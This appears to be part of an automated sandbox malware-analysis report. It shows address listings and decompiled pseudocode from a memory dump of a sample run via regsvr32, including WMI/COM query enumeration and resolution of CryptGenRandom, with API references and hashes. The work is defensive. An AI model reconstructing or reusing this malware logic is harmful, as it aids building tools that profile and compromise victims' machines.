                                                                                                                                                                        0x049f82c0
                                                                                                                                                                        0x049f82c0
                                                                                                                                                                        0x049f82c3
                                                                                                                                                                        0x049f82c3
                                                                                                                                                                        0x049f82c9
                                                                                                                                                                        0x049f82c9
                                                                                                                                                                        0x049f82d1
                                                                                                                                                                        0x049f82d6
                                                                                                                                                                        0x049f82e3
                                                                                                                                                                        0x049f82ec
                                                                                                                                                                        0x049f82ef
                                                                                                                                                                        0x049f82f4
                                                                                                                                                                        0x049f833c
                                                                                                                                                                        0x049f82f6
                                                                                                                                                                        0x049f82f6
                                                                                                                                                                        0x049f82f9
                                                                                                                                                                        0x049f8300
                                                                                                                                                                        0x049f8306
                                                                                                                                                                        0x049f8309
                                                                                                                                                                        0x049f830c
                                                                                                                                                                        0x049f830f
                                                                                                                                                                        0x049f8312
                                                                                                                                                                        0x049f8315
                                                                                                                                                                        0x049f831b
                                                                                                                                                                        0x049f8329
                                                                                                                                                                        0x049f832c
                                                                                                                                                                        0x049f832f
                                                                                                                                                                        0x049f8338
                                                                                                                                                                        0x049f8338
                                                                                                                                                                        0x049f8342
                                                                                                                                                                        0x049f8348
                                                                                                                                                                        0x049f834b
                                                                                                                                                                        0x049f8352
                                                                                                                                                                        0x049f8352
                                                                                                                                                                        0x049f8705
                                                                                                                                                                        0x049f8705
                                                                                                                                                                        0x049f8708
                                                                                                                                                                        0x049f870a
                                                                                                                                                                        0x049f870f
                                                                                                                                                                        0x049f871e
                                                                                                                                                                        0x049f872a
                                                                                                                                                                        0x049f872f
                                                                                                                                                                        0x049f872f
                                                                                                                                                                        0x049f8720
                                                                                                                                                                        0x049f8720
                                                                                                                                                                        0x049f8725
                                                                                                                                                                        0x049f8725
                                                                                                                                                                        0x049f8725
                                                                                                                                                                        0x049f8711
                                                                                                                                                                        0x049f8711
                                                                                                                                                                        0x049f8716
                                                                                                                                                                        0x049f8716
                                                                                                                                                                        0x049f8716
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f870f
                                                                                                                                                                        0x049f82ae
                                                                                                                                                                        0x049f82a3
                                                                                                                                                                        0x049f82a6
                                                                                                                                                                        0x049f8734
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8734
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8737
                                                                                                                                                                        0x049f8737
                                                                                                                                                                        0x049f873b
                                                                                                                                                                        0x049f873b
                                                                                                                                                                        0x049f873b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f8284

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E049EEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				char _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char* _v72;
                                                                                                                                                                        				signed short _v80;
                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                        				char _v88;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				char _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				char _v104;
                                                                                                                                                                        				char _v616;
                                                                                                                                                                        				intOrPtr* _t159;
                                                                                                                                                                        				char _t165;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				signed int _t173;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				intOrPtr* _t187;
                                                                                                                                                                        				signed int _t188;
                                                                                                                                                                        				signed int _t192;
                                                                                                                                                                        				intOrPtr* _t193;
                                                                                                                                                                        				intOrPtr _t200;
                                                                                                                                                                        				intOrPtr* _t205;
                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                        				signed int _t209;
                                                                                                                                                                        				intOrPtr* _t210;
                                                                                                                                                                        				intOrPtr _t212;
                                                                                                                                                                        				intOrPtr* _t213;
                                                                                                                                                                        				signed int _t214;
                                                                                                                                                                        				char _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				signed int _t219;
                                                                                                                                                                        				signed int _t230;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				signed int _t242;
                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                        				signed int _t244;
                                                                                                                                                                        				signed int _t245;
                                                                                                                                                                        				intOrPtr* _t247;
                                                                                                                                                                        				intOrPtr* _t251;
                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                        				intOrPtr* _t253;
                                                                                                                                                                        				void* _t255;
                                                                                                                                                                        				intOrPtr* _t261;
                                                                                                                                                                        				signed int _t262;
                                                                                                                                                                        				signed int _t283;
                                                                                                                                                                        				signed int _t289;
                                                                                                                                                                        				char* _t298;
                                                                                                                                                                        				void* _t320;
                                                                                                                                                                        				signed int _t322;
                                                                                                                                                                        				intOrPtr* _t323;
                                                                                                                                                                        				intOrPtr _t324;
                                                                                                                                                                        				signed int _t327;
                                                                                                                                                                        				intOrPtr* _t328;
                                                                                                                                                                        				intOrPtr* _t329;
                                                                                                                                                                        
                                                                                                                                                                        				_v32 = _v32 & 0x00000000;
                                                                                                                                                                        				_v60 = _v60 & 0x00000000;
                                                                                                                                                                        				_v56 = __edx;
                                                                                                                                                                        				_v100 = __ecx;
                                                                                                                                                                        				_t159 = E049EE400(__ecx);
                                                                                                                                                                        				_t251 = _t159;
                                                                                                                                                                        				_v104 = _t251;
                                                                                                                                                                        				if(_t251 == 0) {
                                                                                                                                                                        					return _t159;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t320 = E049E8BDE(0x10);
                                                                                                                                                                        				_v36 = _t320;
                                                                                                                                                                        				_pop(_t255);
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L53:
                                                                                                                                                                        					E049E8BF4( &_v60, 0xfffffffe);
                                                                                                                                                                        					E049EE4B4( &_v104);
                                                                                                                                                                        					return _t320;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t165 = E049E9DF2(_t255, 0x3a7);
                                                                                                                                                                        				 *_t328 = 0xae7;
                                                                                                                                                                        				_v52 = _t165;
                                                                                                                                                                        				_t166 = E049E9DF2(_t255);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_v56);
                                                                                                                                                                        				_v20 = _t166;
                                                                                                                                                                        				_push(_t166);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_t322 = E049E9A5A(_t165);
                                                                                                                                                                        				_v60 = _t322;
                                                                                                                                                                        				E049E8BAF( &_v52);
                                                                                                                                                                        				E049E8BAF( &_v20);
                                                                                                                                                                        				_t329 = _t328 + 0x20;
                                                                                                                                                                        				if(_t322 != 0) {
                                                                                                                                                                        					_t323 = __imp__#2;
                                                                                                                                                                        					_v40 =  *_t323(_t322);
                                                                                                                                                                        					_t173 = E049E9DF2(_t255, 0x886);
                                                                                                                                                                        					_v20 = _t173;
                                                                                                                                                                        					_v52 =  *_t323(_t173);
                                                                                                                                                                        					E049E8BAF( &_v20);
                                                                                                                                                                        					_t324 = _v40;
                                                                                                                                                                        					_t261 =  *_t251;
                                                                                                                                                                        					_t252 = 0;
                                                                                                                                                                        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                        					__eflags = _t178;
                                                                                                                                                                        					if(_t178 != 0) {
                                                                                                                                                                        						L52:
                                                                                                                                                                        						__imp__#6(_t324);
                                                                                                                                                                        						__imp__#6(_v52);
                                                                                                                                                                        						goto L53;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                        					__eflags = _t262;
                                                                                                                                                                        					if(_t262 == 0) {
                                                                                                                                                                        						L49:
                                                                                                                                                                        						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                        						__eflags = _t252;
                                                                                                                                                                        						if(_t252 == 0) {
                                                                                                                                                                        							E049E8BF4( &_v36, 0);
                                                                                                                                                                        							_t320 = _v36;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *(_t320 + 8) = _t252;
                                                                                                                                                                        							 *_t320 = E049E98BD(_v100);
                                                                                                                                                                        							 *((intOrPtr*)(_t320 + 4)) = E049E98BD(_v56);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L52;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L6;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                        						__eflags = _t186;
                                                                                                                                                                        						if(_t186 != 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                        						_v48 = 0;
                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                        						__eflags = _v84;
                                                                                                                                                                        						if(_v84 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t187 = _v28;
                                                                                                                                                                        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                        						__eflags = _t188;
                                                                                                                                                                        						if(_t188 >= 0) {
                                                                                                                                                                        							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                        							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                        							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                        							_t253 = _t46;
                                                                                                                                                                        							_t327 = _t252 << 3;
                                                                                                                                                                        							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                        							_t192 = E049E8C72(_t327, _t47);
                                                                                                                                                                        							__eflags = _t192;
                                                                                                                                                                        							if(_t192 == 0) {
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t193 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                        								L46:
                                                                                                                                                                        								_t252 = _v20;
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E049E8BDE( *(_t327 +  *_t253) << 3);
                                                                                                                                                                        							_t200 =  *_t253;
                                                                                                                                                                        							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                        							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                        								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                        								E049E8BF4(_t136, 0);
                                                                                                                                                                        								E049E8BF4( &_v36, 0);
                                                                                                                                                                        								__imp__#16(_v24);
                                                                                                                                                                        								_t205 = _v28;
                                                                                                                                                                        								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                        								_t320 = _v36;
                                                                                                                                                                        								goto L46;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t207 = _v16;
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_v12 = _t207;
                                                                                                                                                                        								__eflags = _t207 - _v48;
                                                                                                                                                                        								if(_t207 > _v48) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44 = _v44 & 0x00000000;
                                                                                                                                                                        								_t209 =  &_v12;
                                                                                                                                                                        								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                        								__eflags = _t209;
                                                                                                                                                                        								if(_t209 < 0) {
                                                                                                                                                                        									break;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t212 = E049E98BD(_v44);
                                                                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                        								_t213 = _v28;
                                                                                                                                                                        								_t281 =  *_t213;
                                                                                                                                                                        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                        								__eflags = _t214;
                                                                                                                                                                        								if(_t214 < 0) {
                                                                                                                                                                        									L39:
                                                                                                                                                                        									__imp__#6(_v44);
                                                                                                                                                                        									_t207 = _v12 + 1;
                                                                                                                                                                        									__eflags = _t207;
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v92 = E049E9DF2(_t281, 0xb28);
                                                                                                                                                                        								 *_t329 = 0x83f;
                                                                                                                                                                        								_t217 = E049E9DF2(_t281);
                                                                                                                                                                        								_t283 = _v80;
                                                                                                                                                                        								_v96 = _t217;
                                                                                                                                                                        								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                        								__eflags = _t218 - 0xb;
                                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                                        									_t219 = _t218 - 0x10;
                                                                                                                                                                        									__eflags = _t219;
                                                                                                                                                                        									if(_t219 == 0) {
                                                                                                                                                                        										L35:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E049E8BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											L38:
                                                                                                                                                                        											E049E8BAF( &_v92);
                                                                                                                                                                        											E049E8BAF( &_v96);
                                                                                                                                                                        											__imp__#9( &_v80);
                                                                                                                                                                        											goto L39;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%d");
                                                                                                                                                                        										L37:
                                                                                                                                                                        										_push(0xc);
                                                                                                                                                                        										_push(_t289);
                                                                                                                                                                        										E049E9E51();
                                                                                                                                                                        										_t329 = _t329 + 0x10;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t230 = _t219 - 1;
                                                                                                                                                                        									__eflags = _t230;
                                                                                                                                                                        									if(_t230 == 0) {
                                                                                                                                                                        										L33:
                                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E049E8BDE(0x18);
                                                                                                                                                                        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                        										__eflags = _t289;
                                                                                                                                                                        										if(_t289 == 0) {
                                                                                                                                                                        											goto L38;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(_v72);
                                                                                                                                                                        										_push(L"%u");
                                                                                                                                                                        										goto L37;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t235 = _t230 - 1;
                                                                                                                                                                        									__eflags = _t235;
                                                                                                                                                                        									if(_t235 == 0) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _t235 == 1;
                                                                                                                                                                        									if(_t235 == 1) {
                                                                                                                                                                        										goto L33;
                                                                                                                                                                        									}
                                                                                                                                                                        									L28:
                                                                                                                                                                        									__eflags = _t283 & 0x00002000;
                                                                                                                                                                        									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                        										_v88 = E049E9DF2(_t283, 0xe0a);
                                                                                                                                                                        										E049E9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                        										E049E8BAF( &_v88);
                                                                                                                                                                        										_t329 = _t329 + 0x18;
                                                                                                                                                                        										_t298 =  &_v616;
                                                                                                                                                                        										L31:
                                                                                                                                                                        										_t242 = E049E98BD(_t298);
                                                                                                                                                                        										L32:
                                                                                                                                                                        										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                        										goto L38;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t242 = E049EE92E( &_v80);
                                                                                                                                                                        									goto L32;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                        									__eflags = _v72 - 0xffff;
                                                                                                                                                                        									_t298 = L"TRUE";
                                                                                                                                                                        									if(_v72 != 0xffff) {
                                                                                                                                                                        										_t298 = L"FALSE";
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L31;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t243 = _t218 - 1;
                                                                                                                                                                        								__eflags = _t243;
                                                                                                                                                                        								if(_t243 == 0) {
                                                                                                                                                                        									goto L38;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t244 = _t243 - 1;
                                                                                                                                                                        								__eflags = _t244;
                                                                                                                                                                        								if(_t244 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t245 = _t244 - 1;
                                                                                                                                                                        								__eflags = _t245;
                                                                                                                                                                        								if(_t245 == 0) {
                                                                                                                                                                        									goto L35;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t245 != 5;
                                                                                                                                                                        								if(_t245 != 5) {
                                                                                                                                                                        									goto L28;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t298 = _v72;
                                                                                                                                                                        								goto L31;
                                                                                                                                                                        							}
                                                                                                                                                                        							__imp__#16(_v24);
                                                                                                                                                                        							_t210 = _v28;
                                                                                                                                                                        							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                        							_t252 = _v20;
                                                                                                                                                                        							L42:
                                                                                                                                                                        							_t262 = _v32;
                                                                                                                                                                        							_t252 = _t252 + 1;
                                                                                                                                                                        							_v20 = _t252;
                                                                                                                                                                        							__eflags = _t262;
                                                                                                                                                                        							if(_t262 != 0) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							L48:
                                                                                                                                                                        							_t324 = _v40;
                                                                                                                                                                        							goto L49;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t247 = _v28;
                                                                                                                                                                        						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t262 = _v32;
                                                                                                                                                                        					goto L48;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E049E8BF4( &_v36, _t322);
                                                                                                                                                                        					_t320 = _v36;
                                                                                                                                                                        					goto L53;
                                                                                                                                                                        				}
                                                                                                                                                                        			}





































































                                                                                                                                                                        0x049eec07
                                                                                                                                                                        0x049eedde
                                                                                                                                                                        0x049eedde
                                                                                                                                                                        0x049eede1
                                                                                                                                                                        0x049eede4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec0f
                                                                                                                                                                        0x049eec17
                                                                                                                                                                        0x049eec1e
                                                                                                                                                                        0x049eec24
                                                                                                                                                                        0x049eec26
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec2f
                                                                                                                                                                        0x049eec44
                                                                                                                                                                        0x049eec4a
                                                                                                                                                                        0x049eec53
                                                                                                                                                                        0x049eec56
                                                                                                                                                                        0x049eec59
                                                                                                                                                                        0x049eec5b
                                                                                                                                                                        0x049eedd1
                                                                                                                                                                        0x049eedd4
                                                                                                                                                                        0x049eeddd
                                                                                                                                                                        0x049eeddd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeddd
                                                                                                                                                                        0x049eec6b
                                                                                                                                                                        0x049eec6e
                                                                                                                                                                        0x049eec75
                                                                                                                                                                        0x049eec7b
                                                                                                                                                                        0x049eec7e
                                                                                                                                                                        0x049eec81
                                                                                                                                                                        0x049eec84
                                                                                                                                                                        0x049eec87
                                                                                                                                                                        0x049eecc3
                                                                                                                                                                        0x049eecc3
                                                                                                                                                                        0x049eecc6
                                                                                                                                                                        0x049eed72
                                                                                                                                                                        0x049eed86
                                                                                                                                                                        0x049eed96
                                                                                                                                                                        0x049eed9a
                                                                                                                                                                        0x049eed9c
                                                                                                                                                                        0x049eedb3
                                                                                                                                                                        0x049eedb7
                                                                                                                                                                        0x049eedc0
                                                                                                                                                                        0x049eedcb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eedcb
                                                                                                                                                                        0x049eeda2
                                                                                                                                                                        0x049eeda3
                                                                                                                                                                        0x049eeda8
                                                                                                                                                                        0x049eeda8
                                                                                                                                                                        0x049eedaa
                                                                                                                                                                        0x049eedab
                                                                                                                                                                        0x049eedb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eedb0
                                                                                                                                                                        0x049eeccc
                                                                                                                                                                        0x049eeccc
                                                                                                                                                                        0x049eeccf
                                                                                                                                                                        0x049eed3a
                                                                                                                                                                        0x049eed4e
                                                                                                                                                                        0x049eed5e
                                                                                                                                                                        0x049eed62
                                                                                                                                                                        0x049eed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eed6a
                                                                                                                                                                        0x049eed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eed6b
                                                                                                                                                                        0x049eecd1
                                                                                                                                                                        0x049eecd1
                                                                                                                                                                        0x049eecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecd6
                                                                                                                                                                        0x049eecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecdb
                                                                                                                                                                        0x049eecdb
                                                                                                                                                                        0x049eece1
                                                                                                                                                                        0x049eecfd
                                                                                                                                                                        0x049eed0c
                                                                                                                                                                        0x049eed15
                                                                                                                                                                        0x049eed1a
                                                                                                                                                                        0x049eed1d
                                                                                                                                                                        0x049eed23
                                                                                                                                                                        0x049eed23
                                                                                                                                                                        0x049eed28
                                                                                                                                                                        0x049eed34
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eed34
                                                                                                                                                                        0x049eece6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eece6
                                                                                                                                                                        0x049eec89
                                                                                                                                                                        0x049eecb0
                                                                                                                                                                        0x049eecb5
                                                                                                                                                                        0x049eecba
                                                                                                                                                                        0x049eecbc
                                                                                                                                                                        0x049eecbc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecba
                                                                                                                                                                        0x049eec8b
                                                                                                                                                                        0x049eec8b
                                                                                                                                                                        0x049eec8e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec94
                                                                                                                                                                        0x049eec94
                                                                                                                                                                        0x049eec97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eec9d
                                                                                                                                                                        0x049eec9d
                                                                                                                                                                        0x049eeca0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeca6
                                                                                                                                                                        0x049eeca9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eecab
                                                                                                                                                                        0x049eeded
                                                                                                                                                                        0x049eedf3
                                                                                                                                                                        0x049eedf9
                                                                                                                                                                        0x049eedfc
                                                                                                                                                                        0x049eedff
                                                                                                                                                                        0x049eedff
                                                                                                                                                                        0x049eee02
                                                                                                                                                                        0x049eee03
                                                                                                                                                                        0x049eee06
                                                                                                                                                                        0x049eee08
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eee58
                                                                                                                                                                        0x049eee58
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eee58
                                                                                                                                                                        0x049eeb8f
                                                                                                                                                                        0x049eeb95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeb95
                                                                                                                                                                        0x049eee55
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eead8
                                                                                                                                                                        0x049eeadd
                                                                                                                                                                        0x049eeae2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeae6

APIs
  • Part of subcall function 049EE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE413
  • Part of subcall function 049EE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE424
  • Part of subcall function 049EE400: CoCreateInstance.OLE32(049FC868,00000000,00000001,049FC878,?,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE43B
  • Part of subcall function 049EE400: SysAllocString.OLEAUT32(00000000), ref: 049EE446
  • Part of subcall function 049EE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE471
  • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
• SysAllocString.OLEAUT32(00000000), ref: 049EEAF3
• SysAllocString.OLEAUT32(00000000), ref: 049EEB07
• SysFreeString.OLEAUT32(?), ref: 049EEE90
• SysFreeString.OLEAUT32(?), ref: 049EEE99
  • Part of subcall function 049E8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 049E8C3A
Strings
Memory Dump Source
• Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: eca18684e4c7c1e39a9353b08141e9d5b2665d11e9b6d1b340eac3d6a7b5600b
                                                                                                                                                                        • Instruction ID: b11c49b359d1e61ee937280434038a2d1bf3083782bfc2734a33e18267d524bc
                                                                                                                                                                        • Opcode Fuzzy Hash: eca18684e4c7c1e39a9353b08141e9d5b2665d11e9b6d1b340eac3d6a7b5600b
                                                                                                                                                                        • Instruction Fuzzy Hash: B6E14DB1E00219AFDF16DFE5C888ABEBBB9FF48304F144469E505A7290DB74B945CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E049F28F0(intOrPtr* _a4) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				_Unknown_base(*)()* _t15;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				intOrPtr* _t29;
                                                                                                                                                                        				struct HINSTANCE__* _t30;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                        					L7:
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                        				_v12 = _t15;
                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0xf0000000);
                                                                                                                                                                        				_push(1);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                        				if( *_t25() == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                        				 *_t29(_v8, 0);
                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *_a4 = E049F284B( &_v16);
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,049E7B6A), ref: 049F2902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 049F291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 049F2928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 049F2937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
